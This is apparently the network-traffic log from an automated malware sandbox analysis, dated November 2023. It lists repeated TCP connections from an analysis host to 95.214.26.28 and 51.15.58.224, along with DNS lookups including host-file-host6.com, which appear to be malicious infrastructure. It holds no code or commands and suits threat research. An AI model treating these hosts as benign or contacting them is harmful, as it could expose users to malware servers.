                                                                                                                                                            Nov 10, 2023 15:37:01.647126913 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:01.946281910 CET804973895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:01.946388006 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:01.946599960 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:01.946645021 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:02.246077061 CET804973895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:02.246140957 CET804973895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:02.246601105 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:02.246756077 CET4973880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:02.546015978 CET804973895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:02.715814114 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.015114069 CET804973995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:03.016792059 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.017003059 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.017036915 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.316483021 CET804973995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:03.316585064 CET804973995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:03.316854954 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.316945076 CET4973980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:03.616091967 CET804973995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:06.116156101 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:06.416825056 CET804974095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:06.420751095 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:06.420964956 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:06.420991898 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:06.721843004 CET804974095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:06.721905947 CET804974095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:06.721992970 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:06.722147942 CET4974080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:07.022964954 CET804974095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:10.343220949 CET4974180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:10.642292976 CET804974195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:10.642446995 CET4974180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:10.642767906 CET4974180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:10.643193960 CET4974180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:10.942137957 CET804974195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:10.942198992 CET804974195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:10.942282915 CET4974180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:11.241092920 CET804974195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:19.305011034 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:19.611401081 CET804974395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:19.611562014 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:19.611892939 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:19.611949921 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:19.918579102 CET804974395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:19.918643951 CET804974395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:19.920640945 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:19.920820951 CET4974380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:20.227678061 CET804974395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:28.031781912 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.333117962 CET804974495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:28.333225012 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.333453894 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.333476067 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.634480000 CET804974495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:28.634603024 CET804974495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:28.634682894 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.634860039 CET4974480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:28.935534000 CET804974495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:39.854423046 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.159327030 CET804974595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:40.159548044 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.159674883 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.159674883 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.464432955 CET804974595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:40.464581966 CET804974595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:40.464873075 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.464873075 CET4974580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:40.769623995 CET804974595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:42.940253973 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.240036964 CET804974695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:43.242721081 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.242945910 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.242981911 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.542320013 CET804974695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:43.542344093 CET804974695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:43.542423964 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.542717934 CET4974680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:43.841634989 CET804974695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:48.916013956 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:49.217186928 CET804974795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:49.217295885 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:49.217498064 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:49.217530012 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:49.518966913 CET804974795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:54.967077017 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:55.088280916 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:37:58.217103958 CET804974795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:58.217251062 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.218029976 CET4974780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.232271910 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.518959045 CET804974795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:58.529520988 CET804974895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:58.529597998 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.530220032 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.530267954 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:37:58.827315092 CET804974895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:00.858251095 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:01.024584055 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:38:18.258414030 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:18.361464977 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:38:18.833267927 CET804974895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:18.833354950 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:18.833523989 CET4974880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:18.863696098 CET4974980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:19.130692005 CET804974895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:19.161968946 CET804974995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:19.162226915 CET4974980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:19.162352085 CET4974980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:19.162381887 CET4974980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:19.460791111 CET804974995.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:26.939589024 CET4974980192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:26.952306032 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.253287077 CET804975095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:27.253370047 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.253597975 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.253628016 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.554940939 CET804975095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:27.555083036 CET804975095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:27.555145979 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.555327892 CET4975080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.566354990 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.855968952 CET804975095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:27.867496014 CET804975195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:27.868601084 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.868868113 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:27.868921041 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.169989109 CET804975195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.170010090 CET804975195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.170115948 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.170264006 CET4975180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.191919088 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.239126921 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.361387014 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:38:28.471491098 CET804975195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.493211985 CET804975295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.493279934 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.493575096 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.493601084 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.794673920 CET804975295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.794945002 CET804975295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:28.795037031 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.795197010 CET4975280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:28.811595917 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.097009897 CET804975295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.108692884 CET804975395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.108778000 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.108978033 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.109035969 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.406398058 CET804975395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.406418085 CET804975395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.406514883 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.406759024 CET4975380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.422504902 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.704242945 CET804975395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.724232912 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:29.724538088 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.724538088 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:29.725270033 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.027792931 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.027803898 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.027983904 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.028158903 CET4975480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.028306961 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.037276983 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.328999996 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.329013109 CET804975495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.336193085 CET804975595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.336273909 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.336473942 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.336504936 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.636495113 CET804975595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.636611938 CET804975595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.636682034 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.636854887 CET4975580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.648524046 CET4975680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.935745955 CET804975595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.956691027 CET804975695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:30.958714008 CET4975680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.958910942 CET4975680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:30.959048033 CET4975680192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.267112017 CET804975695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:31.267277002 CET804975695.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:31.287472010 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.585979939 CET804975795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:31.588069916 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.588249922 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.588287115 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.886802912 CET804975795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:31.886995077 CET804975795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:31.887161016 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.887238026 CET4975780192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:31.891422987 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.185558081 CET804975795.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.199343920 CET804975895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.199464083 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.199776888 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.199815035 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.507479906 CET804975895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.507610083 CET804975895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.507930040 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.507930040 CET4975880192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.525540113 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.815772057 CET804975895.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.824623108 CET804976095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:32.824692965 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.824908018 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:32.824937105 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.124152899 CET804976095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.124291897 CET804976095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.124344110 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.124506950 CET4976080192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.139027119 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.423317909 CET804976095.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.440001011 CET804976195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.440120935 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.440500021 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.440540075 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.741591930 CET804976195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.741771936 CET804976195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:33.741857052 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.742027998 CET4976180192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:33.756478071 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.043183088 CET804976195.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.055237055 CET804976295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.055335999 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.055603981 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.055639982 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.354589939 CET804976295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.354845047 CET804976295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.354999065 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.355129957 CET4976280192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.371768951 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.653774023 CET804976295.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.670783043 CET804976395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.670850992 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.671171904 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.671205997 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.970185995 CET804976395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.970344067 CET804976395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:34.970938921 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.972187042 CET4976380192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:34.997440100 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.271106005 CET804976395.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.294821978 CET804976495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.296763897 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.296973944 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.297002077 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.594270945 CET804976495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.594405890 CET804976495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.594482899 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.594681025 CET4976480192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.603152990 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.891623020 CET804976495.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.911204100 CET804976595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:35.911281109 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.911516905 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:35.911550045 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:36.219532967 CET804976595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:36.219624996 CET804976595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:36.219702959 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:36.219922066 CET4976580192.168.2.695.214.26.28
                                                                                                                                                            Nov 10, 2023 15:38:36.527548075 CET804976595.214.26.28192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:38.134254932 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:38.273437977 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:38:48.237493992 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:48.361357927 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:38:58.078638077 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:38:58.158226967 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            Nov 10, 2023 15:39:08.102371931 CET144334972051.15.58.224192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:39:08.158232927 CET4972014433192.168.2.651.15.58.224
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 10, 2023 15:35:34.955749989 CET6405853192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:35:35.156881094 CET53640581.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:35.161048889 CET6446553192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:35:35.855102062 CET53644651.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:57.635658026 CET5931953192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:35:57.790333986 CET53593191.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:35:58.687995911 CET5721453192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:35:58.840703011 CET53572141.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:43.577436924 CET5267753192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:36:43.730679989 CET53526771.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:43.741874933 CET5496853192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:36:44.106184006 CET53549681.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:48.873960972 CET5268953192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:36:49.026984930 CET53526891.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:36:54.431557894 CET5497853192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:36:54.587472916 CET53549781.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:01.276964903 CET6375253192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:01.432312012 CET53637521.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:10.140300035 CET6317853192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:10.336200953 CET53631781.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:19.127515078 CET5244653192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:19.281311035 CET53524461.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:27.834459066 CET5077753192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:27.991992950 CET53507771.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:38.961184025 CET6432553192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:39.115061998 CET53643251.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:39.124864101 CET5536653192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:39.853116989 CET53553661.1.1.1192.168.2.6
                                                                                                                                                            Nov 10, 2023 15:37:48.744489908 CET6269353192.168.2.61.1.1.1
                                                                                                                                                            Nov 10, 2023 15:37:48.897876024 CET53626931.1.1.1192.168.2.6
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Nov 10, 2023 15:35:34.955749989 CET192.168.2.61.1.1.10x9e33Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
